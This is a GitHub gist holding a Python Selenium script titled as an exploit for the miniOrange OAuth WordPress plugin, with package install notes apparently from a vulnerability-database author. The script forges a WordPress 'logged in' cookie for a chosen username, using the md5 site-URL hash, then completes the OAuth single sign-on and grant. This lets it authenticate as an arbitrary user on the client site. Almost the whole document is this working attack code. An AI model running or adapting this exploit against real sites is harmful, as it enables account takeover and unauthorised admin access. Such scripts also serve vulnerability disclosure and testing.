Created
June 20, 2022 20:19
-
-
Save lana-codes/f976ef5e6f094cacabb83a8b310cd3eb to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import sys | |
| import getopt | |
| import requests | |
| from selenium import webdriver | |
| from selenium.webdriver.chrome.options import Options | |
| from selenium.webdriver.common.by import By | |
| import chromedriver_binary | |
| import hashlib | |
| def main(argv): | |
| client_url = 'https://lana.solutions/vdb/miniorange-oauth-client/' | |
| server_url = 'https://lana.solutions/vdb/miniorange-oauth-server/' | |
| username = 'test' | |
| try: | |
| opts, args = getopt.getopt(argv, 'hc:s:u:', ['client_url=', 'server_url=', 'username=']) | |
| except getopt.GetoptError: | |
| print('miniorange_oauth_plugin_vdb_exploit_with_selenium.py -c <client_url> -s <server_url> -u <username>') | |
| sys.exit(2) | |
| for opt, arg in opts: | |
| if opt == '-h': | |
| print('miniorange_oauth_plugin_vdb_exploit_with_selenium.py -c <client_url> -s <server_url> -u <username>') | |
| sys.exit() | |
| elif opt in ('-c', '--client_url'): | |
| client_url = arg | |
| elif opt in ('-s', '--server_url'): | |
| server_url = arg | |
| elif opt in ('-u', '--username'): | |
| username = arg | |
| # format urls | |
| client_url = client_url.rstrip('\/') + '/' | |
| server_url = server_url.rstrip('\/') + '/' | |
| # chrome options | |
| chrome_options = Options() | |
| chrome_options.add_experimental_option('detach', True) | |
| # chrome driver | |
| chrome_driver = webdriver.Chrome(options=chrome_options) | |
| # open oauth server | |
| chrome_driver.get(server_url) | |
| # wp core default cookie hash is md5(siteurl) | |
| wp_cookiehash = hashlib.md5(server_url.rstrip('\/').encode()).hexdigest() | |
| # set wp logged in cookie | |
| chrome_driver.add_cookie({ | |
| 'name': 'wordpress_logged_in_' + wp_cookiehash, | |
| 'value': username + '%7Canything%7Canything%7Canything' | |
| }) | |
| # open oauth client | |
| chrome_driver.get(client_url + 'wp-admin') | |
| # click sso button | |
| chrome_driver.find_element(By.CLASS_NAME, 'mo_oauth_button_div').click() | |
| # click grant allow button | |
| chrome_driver.find_element(By.CLASS_NAME, 'grant-allow').click() | |
| if __name__ == '__main__': | |
| main(sys.argv[1:]) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Packages:
https://pypi.org/project/selenium/
https://pypi.org/project/chromedriver-binary-auto/
Experience with Python packages is required to install the Selenium and ChromeDriver. If you need help, contact us at info@lana.codes